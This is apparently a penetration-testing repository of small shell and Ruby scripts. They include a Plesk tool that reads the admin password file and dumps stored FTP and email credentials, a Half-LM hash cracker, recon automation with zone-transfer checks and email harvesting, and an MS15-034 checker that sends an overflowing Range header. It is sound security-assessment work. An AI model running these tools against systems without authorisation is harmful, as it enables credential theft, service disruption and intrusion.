├── .gitignore ├── Plesk-credetial-gatherer.sh ├── Privchecker.sh (enum4linux output) ├── README.md ├── SSLTest.jar ├── WebSockets.html ├── automator.sh - (Unfinished) ├── domain_to_ip.rb ├── domain_to_ip.sh ├── file-checker.rb ├── hlmcracker.sh ├── mass-ssl-test.rb ├── mass-trace.sh ├── ms15-034-checker.rb ├── neighbours.rb ├── subdomains-creator.rb ├── token_charset.rb └── web-service-finder.sh /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | .DS_Store? 3 | .*.swp -------------------------------------------------------------------------------- /Plesk-credetial-gatherer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #Pulls the credentials (searchable) from the plesk PSA database. Also determins what version of plesk is running to get the correct command to retrieve the password > version 10.3 4 | # Usage: ./Plesk-credetial-gatherer.sh 5 | # 6 | # By: Leon Teale (RandomStorm) 7 | # 8 | 9 | 10 | while : 11 | do 12 | clear 13 | echo "######################" 14 | echo "* "$blue MENU$normal" *" 15 | echo "*--------------------*" 16 | echo "* 1) FTP *" 17 | echo "* 2) Email *" 18 | echo "* 3) Search *" 19 | echo "* 4) Plesk Pass *" 20 | echo "* 5) Power user mode *" 21 | echo "* *" 22 | echo "* 0) exit *" 23 | echo "######################" 24 | 25 | read opt 26 | case $opt in 27 | 28 | 1) mysql -uadmin psa -p`cat /etc/psa/.psa.shadow` -e "SELECT login AS FTP_USER,password AS FTP_PASS,home AS DOMAIN_ROOT,accounts.id,sys_users.account_id FROM accounts, sys_users WHERE accounts.id=sys_users.account_id;" 29 | read enterkey;; 30 | 31 | 2) mysql -uadmin psa -p`cat /etc/psa/.psa.shadow` -e "SELECT accounts.id, mail.mail_name, accounts.password, domains.name FROM domains LEFT JOIN mail ON domains.id = mail.dom_id LEFT JOIN accounts ON mail.account_id = accounts.id;" 32 | read enterkey;; 33 | 34 | 3) 35 | echo "############################" 36 | echo "* Search in: *" 37 | echo "****************************" 38 | echo "* 1) FTP *" 39 | echo "* 2) EMAIL *" 40 | echo "* 3) ALL *" 41 | echo "############################" 42 | read option 43 | case $option in 44 | 45 | 1) echo "Enter Search Term" 46 | read search; 47 | mysql -uadmin psa -p`cat /etc/psa/.psa.shadow` -e "SELECT login AS FTP_USER,password AS FTP_PASS,home AS DOMAIN_ROOT,accounts.id,sys_users.account_id FROM accounts, sys_users WHERE accounts.id=sys_users.account_id;" | grep "$search" | awk '{ print "User: "$1 "\n" "Pass: "$2 "\n" "Home_Path: "$3"\n"}'; 48 | read enterkey;; 49 | 50 | 2) echo "Enter Search Term" 51 | read search; 52 | mysql -uadmin psa -p`cat /etc/psa/.psa.shadow` -e "SELECT accounts.id, mail.mail_name, accounts.password, domains.name FROM domains LEFT JOIN mail ON domains.id = mail.dom_id LEFT JOIN accounts ON mail.account_id = accounts.id;" | grep "$search" | awk '{ print $2"@"$4 " " "\n" "Pass:"$3"\n"}'; 53 | read enterkey;; 54 | 3) echo "Enter Search Term" 55 | read search; 56 | echo "" 57 | echo "FTP" 58 | mysql -uadmin psa -p`cat /etc/psa/.psa.shadow` -e "SELECT login AS FTP_USER,password AS FTP_PASS,home AS DOMAIN_ROOT,accounts.id,sys_users.account_id FROM accounts, sys_users WHERE accounts.id=sys_users.account_id;" | grep "$search" | awk '{ print "User: "$1 "\n" "Pass: "$2 "\n" "Home_Path: "$3"\n"}'; 59 | echo "" 60 | echo "EMAIL" 61 | mysql -uadmin psa -p`cat /etc/psa/.psa.shadow` -e "SELECT accounts.id, mail.mail_name, accounts.password, domains.name FROM domains LEFT JOIN mail ON domains.id = mail.dom_id LEFT JOIN accounts ON mail.account_id = accounts.id;" | grep "$search" | awk '{ print $2"@"$4 " " "\n""Pass:"$3 "\n"}'; 62 | read enterkey;; 63 | esac;; 64 | 65 | 4) /usr/local/psa/bin/admin --show-password; 66 | read enterkey;; 67 | 68 | 5) 69 | echo "############################" 70 | echo "* Power User mode: *" 71 | echo "****************************" 72 | echo "* 1) On *" 73 | echo "* 2) Off *" 74 | echo "* *" 75 | echo "* 0) exit *" 76 | echo "############################" 77 | read option 78 | case $option in 79 | 1) /usr/local/psa/bin/poweruser --on 80 | echo "Power User mode On" 81 | read enterkey;; 82 | 2) /usr/local/psa/bin/poweruser --off 83 | echo "Power User mode Off" 84 | read enterkey;; 85 | 0) echo "Exiting" 86 | exit 1;; 87 | *) echo "please Enter A Valid Option" 88 | read enterkey;; 89 | esac;; 90 | 0) echo "Exiting" 91 | exit 1;; 92 | *) echo "please Enter A Valid Option" 93 | read enterkey;; 94 | 95 | esac 96 | done 97 | -------------------------------------------------------------------------------- /Privchecker.sh (enum4linux output): -------------------------------------------------------------------------------- 1 | #/bin/bash 2 | # By: Leon Teale (RandomStorm) 3 | # 4 | ## Setting Coloured variables 5 | red=`echo -e "\033[31m"` 6 | lcyan=`echo -e "\033[36m"` 7 | yellow=`echo -e "\033[33m"` 8 | green=`echo -e "\033[32m"` 9 | blue=`echo -e "\033[34m"` 10 | purple=`echo -e "\033[35m"` 11 | normal=`echo -e "\033[m"` 12 | 13 | groups=groups.txt 14 | 15 | if [ ! -a $groups ] 16 | then 17 | echo -e "Domain Admins\nSQL" > $groups 18 | fi 19 | 20 | if (( $# != 2 )) 21 | then 22 | echo "Usage: ./privcheker.sh users.txt enum.txt" 23 | exit 1 24 | fi 25 | 26 | 27 | clear 28 | for user in `cat $1`;do 29 | echo "" 30 | echo "$yellow$user$normal has access to:" 31 | echo "$green" 32 | fgrep -w -f $1 $2 | awk {'print $NF, $0'} | sort | awk {' $1 =""; print'} | grep $user | cut -d \' -f 2 | grep -i -v 'rid' | grep -v '\$' | grep -v '\{' | sort -u 33 | echo "$normal" 34 | done 35 | if 36 | fgrep -w -f $1 $2 | awk {'print $NF, $0'} | sort | awk {' $1 =""; print'} | grep -f $groups > /dev/null 2>&1 37 | then 38 | echo "+---------------------------------------+" 39 | echo "|$yellow Possible$red High Privilaged$yellow Users Found!$normal|" 40 | echo "+---------------------------------------+" 41 | 42 | group=`fgrep -w -f $1 $2 | awk {'print $NF, $0'} | sort | awk {' $1 =""; print'} | grep -f $groups | cut -d \( -f 1 | cut -d \' -f 2 | grep -i -v 'rid' | grep -v '\{' | sort -u ` 43 | 44 | echo "Groups found: $red$group$normal" 45 | echo "" 46 | 47 | #fgrep -f $1 $2 | sort | awk {' $1 =""; print'} | grep -f $groups | awk {'print $NF,"-" $0 '} | cut -d \( -f 1 | grep -i -v 'rid' | grep -v '\$' | grep -v '\{' | cut -d "\\" -f 2 | awk {'print $NF, $0'} | sort | awk {' $1 =""; print'} 48 | 49 | 50 | fgrep -w -f $1 $2 | sort | awk {' $1 =""; print'} | grep -f $groups | awk {'print $NF,"-" $0 '} | cut -d \( -f 1 | grep -i -v 'rid' | grep -v '\$' | grep -v '\{' | cut -d "\\" -f 2 | cut -d - -f 1 | column 51 | 52 | echo "" 53 | else 54 | 55 | echo "+--------------------------------+" 56 | echo "|$green No High Privilaged Users Found$normal |" 57 | echo "+--------------------------------+" 58 | echo "" 59 | fi 60 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Scripts 2 | ======= 3 | 4 | Small snippets of code we often find useful. 5 | 6 | Licence 7 | ======= 8 | 9 | This project released under the Creative Commons Attribution-Share Alike 2.0 10 | UK: England & Wales 11 | 12 | ( http://creativecommons.org/licenses/by-sa/2.0/uk/ ) 13 | -------------------------------------------------------------------------------- /SSLTest.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ethicalhack3r/scripts/47117781d8f4a66bd1cb57f15008a09f4bbd4ec3/SSLTest.jar -------------------------------------------------------------------------------- /WebSockets.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | WebSocket Tester 5 | 6 | 78 | 79 | 80 | 81 | 82 |

WebSocket Tester

83 | Target: 84 | 85 |
86 | 87 | 88 |
89 |
Message: 90 | 91 | 92 |
93 |
Output: 94 |
95 | 96 | 97 | -------------------------------------------------------------------------------- /automator.sh - (Unfinished): -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #Automatically run recon against a domain/list of domains. 4 | #Built for Backtrack 5 | # 6 | # Current Features: 7 | # * DNS Recon 8 | # * Email Harvesting 9 | # * Meta Data Enumeration 10 | # * WhoIs 11 | # 12 | # Additional Features 13 | # * Pull domains from SSL Certificate 14 | # 15 | # Usage: ./automator.sh listofdomains.txt 16 | # Usage: ./automator.sh domain.com 17 | # 18 | # By: Leon Teale (RandomStorm) 19 | # 20 | 21 | ## Setting Coloured variables 22 | red=`echo -e "\033[31m"` 23 | lcyan=`echo -e "\033[36m"` 24 | yellow=`echo -e "\033[33m"` 25 | green=`echo -e "\033[32m"` 26 | blue=`echo -e "\033[34m"` 27 | purple=`echo -e "\033[35m"` 28 | normal=`echo -e "\033[m"` 29 | 30 | ## Check for correct usage 31 | if [ -z "$1" ]; 32 | then 33 | echo "" 34 | echo "Usage: ./automator.sh listofdomains.txt" 35 | echo "Usage: ./automator.sh domain.com" 36 | echo "" 37 | 38 | ## Run script on correct usage 39 | else 40 | 41 | ##Set Variables 42 | domain="$1" 43 | output_dir="~/Desktop" 44 | 45 | #Run scripts without arguments 46 | clear 47 | echo "$yellow _ _ " 48 | echo "$yellow /\ | | | | " 49 | echo "$yellow / \ _ _| |_ ___ _ __ ___ __ _| |_ ___ _ __ " 50 | echo "$yellow / /\ \| | | | __/ _ \| '_ \` _ \ / _\` | __/ _ \| '__|" 51 | echo "$yellow / ____ \ |_| | || (_) | | | | | | (_| | || (_) | | " 52 | echo "$yellow /_/ \_\__,_|\__\___/|_| |_| |_|\__,_|\__\___/|_|$normal" 53 | echo "$lcyan -- by Leon Teale (Randomstorm)" 54 | echo "" 55 | echo "$blue +-------------------------------------------+" 56 | echo "$blue | $red Current Features$normal $blue |$normal" 57 | echo "$blue | $yellow * DNS Recon$normal $blue |$normal" 58 | echo "$blue | $yellow * Email Harvesting$normal $blue |$normal" 59 | echo "$blue | $yellow * Meta DataEnumeration$normal $blue |$normal" 60 | echo "$blue | $yellow * WhoIs$normal $blue|$normal" 61 | echo "$blue | |" 62 | echo "$blue | $red Additional Features $normal $blue |$normal" 63 | echo "$blue | $yellow * Pull domains From SSL Cert$normal$blue |$normal" 64 | echo "$blue +-------------------------------------------+$normal" 65 | echo "$lcyan Target = '$green$domain$lcyan'" 66 | echo "" 67 | mkdir -p ~/Desktop/$domain 68 | mkdir -p ~/Desktop/$domain/metagoofil 69 | sleep 1 70 | 71 | ## Set Variables ## 72 | echo "Run intense scan? [y/N]" 73 | read intense 74 | 75 | 76 | ## Main Features: ## 77 | 78 | ## Run the DNS Stage 79 | if 80 | [[ "$intense" == "y" ]] 81 | then 82 | echo "$yellow Running DNS Recon Stage..$normal (..Very Slow)" 83 | echo "" 84 | if 85 | dig @`dig ns $domain | grep -v '^;' | grep A | cut -f1 | head -1` $domain axfr | grep "XFR size" 86 | then 87 | echo "$lcyan Zone Transfer Vulnerability: ($red Yes $lcyan)$normal" 88 | else 89 | echo "$lcyan Zone Transfer Vulnerability: ($green No $lcyan)$normal" 90 | fi 91 | echo "" 92 | dnsrecon -t brt,std,axfr -D /root/Desktop/wordlists/dnsbruteforce.txt -d $domain > /tmp/$domain.dnsrecon.txt.tmp 93 | cat /tmp/$domain.dnsrecon.txt.tmp | grep '[^\.][0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}[^\.]' | grep -vE 'Trying|TCP|MX|NS|SOA|Has' | awk {'print $3 "\t" $4'} | sort -u | sed '/^$/d' > ~/Desktop/$domain/dnsrecon.txt 94 | echo "$lcyan Subdomains found: ($yellow `cat ~/Desktop/$domain/dnsrecon.txt | wc -l` $lcyan)$normal" 95 | echo "" 96 | else 97 | echo "$yellow Running DNS Recon Stage..$normal" 98 | echo "" 99 | if 100 | dig @`dig ns $domain | grep -v '^;' | grep A | cut -f1 | head -1` $domain axfr | grep "XFR size" 101 | then 102 | echo "$lcyan Zone Transfer Vulnerability: ($red Yes $lcyan)$normal" 103 | else 104 | echo "$lcyan Zone Transfer Vulnerability: ($green No $lcyan)$normal" 105 | fi 106 | echo "" 107 | dnsrecon -t brt,std,axfr -D /usr/share/dnsrecon/namelist.txt -d $domain > /tmp/$domain.dnsrecon.txt.tmp 108 | cat /tmp/$domain.dnsrecon.txt.tmp | grep '[^\.][0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}[^\.]' | grep -vE 'Trying|TCP|spf1|SOA|Has' | awk {'print $3 "\t" $4'} | sort -u | grep $domain | sed '/^$/d' > ~/Desktop/$domain/dnsrecon.txt 109 | echo "$lcyan Subdomains found: ($yellow `cat ~/Desktop/$domain/dnsrecon.txt | wc -l` $lcyan)$normal" 110 | echo "" 111 | fi 112 | rm -rf /tmp/$domain.dnsrecon.txt.tmp 113 | echo "" >> ~/Desktop/$domain/dnsrecon.txt 114 | echo "Name Servers" >> ~/Desktop/$domain/dnsrecon.txt 115 | dig ns $domain | grep -v '^;' | grep A | awk {'print $1 "\t" $5'} | sed '/^$/d' >> ~/Desktop/$domain/dnsrecon.txt 116 | echo "" >> ~/Desktop/$domain/dnsrecon.txt 117 | echo "MX Records" >> ~/Desktop/$domain/dnsrecon.txt 118 | dig mx $domain | grep -v '^;' | grep $domain | awk {'print $6'} | sed '/^$/d' >> ~/Desktop/$domain/dnsrecon.txt 119 | cat ~/Desktop/$domain/dnsrecon.txt 120 | echo "" 121 | echo "$green DNS Recon Stage Complete!$normal" 122 | 123 | ## Run the Mail Harvesting Stage 124 | echo "+------------------------------------------------+" 125 | echo "" 126 | echo "$yellow Running Email Harvesting Stage..$normal" 127 | theharvester -l 500 -b all -d $domain > /tmp/$domain.emails.txt.tmp 128 | cat /tmp/$domain.emails.txt.tmp | grep @ | grep -vE 'cmartore' > ~/Desktop/$domain/emails.txt 129 | rm -rf /tmp/$domain.emails.txt.tmp 130 | echo "$lcyan Email Addresses Found: ($yellow `cat ~/Desktop/$domain/emails.txt | wc -l` $lcyan)$normal" 131 | echo "" 132 | cat ~/Desktop/$domain/emails.txt | column -c 100 133 | echo "" 134 | echo "$green Email Harvesting Stage Complete!$normal" 135 | 136 | ## Run the MetaGooFil Stage 137 | echo "+------------------------------------------------+" 138 | echo "" 139 | echo "$yellow Running Meta Data Gathering Stage..$normal" 140 | echo "" 141 | metagoofil -d $domain -t pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx -l 20 -n 20 -o ~/Desktop/$domain/metagoofil/ -f ~/Desktop/$domain/users_temp.txt > /dev/null 142 | cat ~/Desktop/$domain/users_temp.txt | sed 's/useritem/\n/g' | grep '">' | grep -vE 'head' | awk -F "<" {'print $1'} | cut -d">" -f2 | sed -e "s/^ \{1,\}//" > ~/Desktop/$domain/users.txt 143 | echo "$lcyan Users found: ($yellow `cat ~/Desktop/$domain/users.txt | wc -l` $lcyan)$normal" 144 | echo "" 145 | cat ~/Desktop/$domain/users.txt 146 | echo "" 147 | echo "$green Meta Data Stage Complete!$normal" 148 | 149 | ## Run the WhoIs 150 | echo "+------------------------------------------------+" 151 | echo "" 152 | whois $domain > ~/Desktop/$domain/whois.txt 153 | echo "$yellow Running WhoIs..$normal" 154 | echo "" 155 | echo "$green WhoIs output saved to: $lcyan ~/Desktop/$domain/whois.txt$normal" 156 | ## Additional Features: ## 157 | 158 | ## Pull domains from SSL Certificate 159 | echo "+------------------------------------------------+" 160 | echo "" 161 | echo "$yellow Pulling Domains from SSL Certificates $normal" 162 | echo "" 163 | sslscan --ssl2 $domain | grep DNS | sed 's/,/"\n"/g' | sed 's/"//g' | cut -d':' -f2 > ~/Desktop/$domain/sslcertdomains_temp.txt 164 | nmap -vv $domain -script=ssl-cert -p443 | grep commonName | grep -v 'Issuer' | cut -d '/' -f1 | cut -d '=' -f2 >> ~/Desktop/$domain/sslcertdomains_temp.txt 165 | cat ~/Desktop/$domain/sslcertdomains_temp.txt | sort -u > ~/Desktop/$domain/sslcertdomains.txt 166 | cat ~/Desktop/$domain/sslcertdomains.txt 167 | rm ~/Desktop/$domain/sslcertdomains_temp.txt 168 | echo "" 169 | echo "$green Finished Pulling Domains!$normal" 170 | echo "" 171 | 172 | 173 | 174 | fi 175 | -------------------------------------------------------------------------------- /domain_to_ip.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # 4 | # This script takes a file with a list of domains from STDIN and outputs the associated IP address. 5 | # Example: ruby domain_to_ip.rb domains.txt 6 | # 7 | # By: Ryan Dewhurst (RandomStorm) 8 | # 9 | 10 | require 'socket' 11 | 12 | if file = ARGV[0] 13 | domains = File.open(file) 14 | 15 | domains.each do |domain| 16 | domain.chop! 17 | 18 | begin 19 | ip = IPSocket::getaddress(domain) 20 | puts "#{domain}\t#{IPSocket::getaddress(domain)}" 21 | rescue 22 | puts "#{domain} N/A" 23 | end 24 | end 25 | else 26 | puts "Usage: ./domain_to_ip.rb urls.txt" 27 | end 28 | -------------------------------------------------------------------------------- /domain_to_ip.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #Gets the ips for the specified list of domains 4 | # 5 | # Usage: ./resolves.sh urls.txt 6 | # 7 | # By: Leon Teale (RandomStorm) 8 | # 9 | 10 | 11 | ## Check for correct usage 12 | if [ -z "$1" ]; 13 | then 14 | echo "" 15 | echo "please provide a file of URLs" 16 | echo " Usage: ./resolves.sh urls.txt" 17 | echo "" 18 | else 19 | echo "" 20 | 21 | for urls in `cat $1`; do 22 | host $urls | grep '[^\.][0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}[^\.]' | awk {'print $1 " " $4'} 23 | done 24 | -------------------------------------------------------------------------------- /file-checker.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # 4 | # This script takes a filename or directory as an argument as well as a list of URLs. 5 | # It will check every URL for that filename/directory and output the status code. 6 | # Useful if you want to check, phpinfo.php exists on multiple domains for example. 7 | # Example: ruby file-checker.rb filename urls.txt 8 | # 9 | # By: Ryan Dewhurst (RandomStorm) 10 | # 11 | 12 | require 'typhoeus' 13 | require 'uri' 14 | 15 | puts "Usage: filename urls.txt" if ARGV[0].nil? 16 | 17 | filename = ARGV[0] 18 | urls = File.open(ARGV[1]) 19 | 20 | urls.each do |url| 21 | url = URI(url).merge(filename) 22 | 23 | response = Typhoeus.get( url.to_s, 24 | :ssl_verifyhost => 0, 25 | :ssl_verifypeer => false, 26 | :followlocation => true, 27 | :headers => {'User-Agent' => 'Mozilla'}, 28 | :timeout => 1000 ) 29 | 30 | puts "#{url} #{response.code}" 31 | end 32 | 33 | exit -------------------------------------------------------------------------------- /hlmcracker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #Built for Kali 4 | # 5 | # This tool will use rcrack to perform the full cracking process of a Half LM Hash. 6 | # 7 | # 8 | # Usage: ./hlmcrack.sh hlmhashes.txt 9 | # 10 | # Make sure to set the "hlmtable" variable to point to your hlm rainbow tables 11 | # 12 | # By: Leon Teale (RandomStorm) 13 | # 14 | 15 | #Set path to your half lm tables 16 | hlmtable=/root/Desktop/wordlists/Rainbow_Tables/Halflmchall/ 17 | 18 | 19 | 20 | #Check usage 21 | if [ -z "$1" ]; 22 | then 23 | echo "Usage: ./hlmcrack.sh john_netntlm.txt" 24 | 25 | else 26 | 27 | for line in `cat $1 | sort -u`; do 28 | 29 | echo "$line" > /tmp/newhash.txt 30 | hash="$line" 31 | username="`echo $line | cut -d : -f 1`" 32 | seedhash="`echo $line | cut -d : -f 4 | sed 's/\(.\{16\}\).*/\1/'`" 33 | 34 | #Get the seed (the first 16 digits of the hash) 35 | /usr/bin/rcracki_mt -h $seedhash $hlmtable > /tmp/seed.tmp 36 | 37 | seed=`cat /tmp/seed.tmp | grep "plaintext of" | awk {'print ($NF)'}` 38 | 39 | #Crack the remaining hash 40 | perl /usr/share/metasploit-framework/data/john/run.linux.x64.mmx/netntlm.pl --seed $seed --file /tmp/newhash.txt 1> /dev/null 41 | perl /usr/share/metasploit-framework/data/john/run.linux.x64.mmx/netntlm.pl --file /tmp/newhash.txt | grep "($username)" 2> /dev/null >> /tmp/hlmcrack.txt 42 | 43 | done 44 | fi 45 | 46 | #Printed Output 47 | clear 48 | echo "#################################################################################" 49 | echo "Half LM cracked: cracked `cat /tmp/hlmcrack.txt | wc -l`\\`cat $1 | wc -l`" 50 | echo "" 51 | cat /tmp/hlmcrack.txt 52 | echo "" 53 | echo "#################################################################################" 54 | rm /tmp/hlmcrack.txt 55 | rm /tmp/newhash.txt 56 | rm /tmp/seed.tmp 57 | -------------------------------------------------------------------------------- /mass-ssl-test.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # 4 | # By: Erwan Le Rousseau (RandomStorm) 5 | # 6 | 7 | require 'terminal-table' 8 | require 'ruby-progressbar' 9 | 10 | ssl_test_bin = ARGV[1] || File.expand_path(File.dirname(__FILE__) + '/SSLTest.jar') 11 | beast = %r{BEAST status: vulnerable}i 12 | crime = %r{CRIME status: vulnerable}i 13 | sslv2 = %r{SSLv2} 14 | rc4 = %r{RC4_} 15 | cn = %r{CN=([^,\n]+)} 16 | ciphers_min = %r{Minimal encryption strength:\s+([^\n]+)\n} 17 | ciphers_max = %r{Achievable encryption strength:\s+([^\n]+)\n} 18 | error = %r{No SSL/TLS server at}i 19 | 20 | def get_cipher_strength(output) 21 | if output =~ /no encryption/ 22 | strength = '0 bit' 23 | else 24 | strength = output[/[^\(]+\(([^\)]+)\)/, 1] 25 | end 26 | strength 27 | end 28 | 29 | if file = ARGV[0] 30 | if File.exists?(ssl_test_bin) 31 | begin 32 | rows = [] 33 | targets = File.readlines(file) 34 | headings = ['Target', 'CN', 'SSLv2', 'Ciphers Strength (min - achievable)', 'BEAST', 'CRIME', 'RC4'] 35 | bar = ProgressBar.create(:format => '%a <%B> (%c / %C) %P%% %e', :total => targets.size) 36 | 37 | targets.flatten.uniq.each do |target| 38 | target.chomp! 39 | 40 | row = [target] 41 | command = %x{java -jar #{ssl_test_bin} #{target}} 42 | 43 | if command.match(error) 44 | row << { :value => 'Error: ' + command, :colspan => 6 } 45 | elsif command.empty? 46 | row << { :value => 'Error: Empty Response (might be a java exception)', :colspan => 6 } 47 | else 48 | row << command[cn, 1] 49 | row << (command.match(sslv2) ? 'Yes' : 'No') 50 | row << (get_cipher_strength(command[ciphers_min, 1]) + ' - ' + get_cipher_strength(command[ciphers_max, 1])) 51 | row << (command.match(beast) ? 'Yes' : 'No') 52 | row << (command.match(crime) ? 'Yes' : 'No') 53 | row << (command.match(rc4) ? 'Yes' : 'No') 54 | end 55 | 56 | rows << row 57 | bar.progress += 1 58 | end 59 | ensure 60 | puts 61 | puts Terminal::Table.new(:headings => headings, :rows => rows).to_s 62 | puts 63 | end 64 | else 65 | puts "The file #{ssl_test_bin} does not exist" 66 | end 67 | else 68 | puts 'Usage: ./mass-ssl-test.rb targets.txt [/path/to/SSLTest.jar]' 69 | puts ' If the path to SSLTest.jar is not supllied, SSLTest.jar must be in the current directory' 70 | puts ' Targets format is the same than SSLTest.jar : IP/servername [port]' 71 | end -------------------------------------------------------------------------------- /mass-trace.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # 4 | # This script takes the urls.txt file from the same directory and performs a TRACE request on each of the URLs. 5 | # Useful when you have to verify that the TRACE method is enabled across multiple domains. 6 | # 7 | # By: Ryan Dewhurst (RandomStorm) 8 | # 9 | 10 | while read url; do 11 | curl -X TRACE $url --insecure 12 | done < urls.txt 13 | -------------------------------------------------------------------------------- /ms15-034-checker.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # 4 | ## Author: Erwan Le Rousseau (RandomStorm) 5 | # 6 | # As Nessus fails to correctly detect this issue (seems to only check for the welcome.png), 7 | # and not giving any output on the file that was tested, this script test all potential static files 8 | # that are most likely to have the IIS Kernel cache enabled, such as JS, CSS etc for the MS-15-034. 9 | # 10 | ## References: 11 | # https://technet.microsoft.com/en-us/library/security/ms15-034.aspx 12 | # http://www.cvedetails.com/cve/CVE-2015-1635/ 13 | # https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb 14 | ## 15 | # 16 | 17 | require 'typhoeus' 18 | require 'nokogiri' 19 | require 'optparse' 20 | require 'addressable/uri' 21 | 22 | @opts = { 23 | verbose: false, 24 | proxy: nil, 25 | timeout: 20, 26 | connecttimeout: 10, 27 | user_agent: 'Mozilla/5.0 Gecko/20100101 Firefox/37.0 T/%s' 28 | } 29 | 30 | URL_PATTERN = %r{^https?://} 31 | VULNERABLE_PATTERN = /Requested Range Not Satisfiable/i 32 | SAFE_PATTERN = /The request has an invalid header name/i 33 | 34 | opt_parser = OptionParser.new('Usage: ./ms15-034-checker.rb [options] URL-OR-FILE', 30) do |opts| 35 | opts.on('--proxy PROXY', '-p', 'Proxy to use, e.g: socks5://127.0.0.1:9090') do |proxy| 36 | @opts[:proxy] = proxy 37 | end 38 | 39 | opts.on('--timeout SECONDS', 'The number of seconds for the request to be performed, default 20s') do |timeout| 40 | @opts[:timeout] = timeout 41 | end 42 | 43 | opts.on('--connect-timeout SECONDS', 'The number of seconds for the connection to be established before timeout, default 10s') do |timeout| 44 | @opts[:connecttimeout] = timeout 45 | end 46 | 47 | opts.on('--verbose', '-v', 'Verbose Mode') do 48 | @opts[:verbose] = true 49 | end 50 | end 51 | 52 | opt_parser.parse! 53 | 54 | module Typhoeus 55 | # Custom Response class 56 | class Response 57 | # @return [ Nokogiri::HTML ] The response's body parsed by Nokogiri 58 | def html 59 | @html ||= Nokogiri::HTML(body.encode('UTF-8', invalid: :replace, undef: :replace)) 60 | end 61 | end 62 | end 63 | 64 | class Target 65 | attr_reader :uri 66 | 67 | def initialize(url) 68 | # Adds a trailing slash if not present 69 | @uri = Addressable::URI.parse( 70 | url[-1, 1] != '/' ? url + '/' : url 71 | ) 72 | end 73 | 74 | def url 75 | @uri.to_s 76 | end 77 | 78 | def in_scope_urls(res, xpath = '//link|//script|//style|//img', attributes = %w(href src)) 79 | found = [] 80 | 81 | res.html.xpath(xpath).each do |tag| 82 | attributes.each do |attribute| 83 | attr_value = tag[attribute] 84 | 85 | next unless attr_value && !attr_value.empty? 86 | 87 | url = uri.join(attr_value.strip).to_s 88 | 89 | next unless in_scope?(url) 90 | 91 | yield url, tag if block_given? && !found.include?(url) 92 | 93 | found << url 94 | end 95 | end 96 | 97 | found.uniq 98 | end 99 | 100 | def in_scope?(url) 101 | Addressable::URI.parse(url.strip).host == @uri.host 102 | end 103 | end 104 | 105 | def request_params 106 | { 107 | timeout: @opts[:timeout], 108 | connecttimeout: @opts[:connecttimeout], 109 | proxy: @opts[:proxy], 110 | followlocation: true, 111 | headers: { 'User-Agent' => format(@opts[:user_agent], Time.now.to_i) } 112 | } 113 | end 114 | 115 | def check_exploit(url) 116 | res = send_payload(url) 117 | 118 | if res && res.body =~ VULNERABLE_PATTERN 119 | 'vulnerable' 120 | elsif res && res.body =~ SAFE_PATTERN 121 | 'safe' 122 | else 123 | 'unknown' 124 | end 125 | end 126 | 127 | def send_payload(url) 128 | Typhoeus.get( 129 | url, 130 | request_params.merge( 131 | headers: { 132 | 'Range' => 'bytes=0-18446744073709551615', 133 | 'User-Agent' => format(@opts[:user_agent], Time.now.to_i) 134 | } 135 | ) 136 | ) 137 | end 138 | 139 | argv = ARGV[0] 140 | targets = [] 141 | 142 | unless argv 143 | puts opt_parser.help 144 | exit(0) 145 | end 146 | 147 | if argv =~ URL_PATTERN 148 | targets << Target.new(argv) 149 | else 150 | File.open(argv).each do |line| 151 | if line =~ URL_PATTERN 152 | targets << Target.new(line.chomp) 153 | elsif @opts[:verbose] 154 | puts "[Warning] - #{line.chomp} is not a valid URL - Ignored" 155 | end 156 | end 157 | end 158 | 159 | targets.each do |target| 160 | begin 161 | puts 162 | puts "[+] Checking #{target.url}" 163 | 164 | res = Typhoeus.get(target.url, request_params) 165 | 166 | (target.in_scope_urls(res) << target.uri.join('welcome.png').to_s).each do |url| 167 | print " | #{url} - " 168 | 169 | state = check_exploit(url) 170 | 171 | puts state 172 | 173 | break unless state == 'unknown' 174 | end 175 | rescue Interrupt 176 | puts 'Interrupted by user, jumping to next target' 177 | next 178 | rescue => e 179 | puts "[Error] - #{e.message}" 180 | next 181 | end 182 | end 183 | 184 | 185 | 186 | -------------------------------------------------------------------------------- /neighbours.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # 4 | # This script takes a domain name or an IP address and retrieve it's neighbours 5 | # Example: ./neighbours.rb randomstorm.com 6 | # 7 | # By: Erwan Le Rousseau (RandomStorm) 8 | # 9 | 10 | require 'typhoeus' 11 | require 'nokogiri' 12 | 13 | if address = ARGV[0] 14 | api_url = 'http://www.ipneighbour.com/' 15 | response = Typhoeus.post(api_url, :body => { 'domainName' => address }) 16 | doc = Nokogiri::HTML(response.body) 17 | 18 | doc.search('div#resultsContainer ul li a').each do |node| 19 | puts node.text.strip 20 | end 21 | else 22 | puts 'Usage: ./neighbours.rb domain_name_or_ip' 23 | end 24 | -------------------------------------------------------------------------------- /subdomains-creator.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # 4 | # By: Erwan Le Rousseau (RandomStorm) 5 | # 6 | 7 | if domains_file = ARGV[0] and subdomains_file = ARGV[1] 8 | domains = File.readlines(domains_file) 9 | subdomains = File.readlines(subdomains_file) 10 | 11 | subdomains.sort.each do |subdomain| 12 | domains.each do |domain| 13 | puts 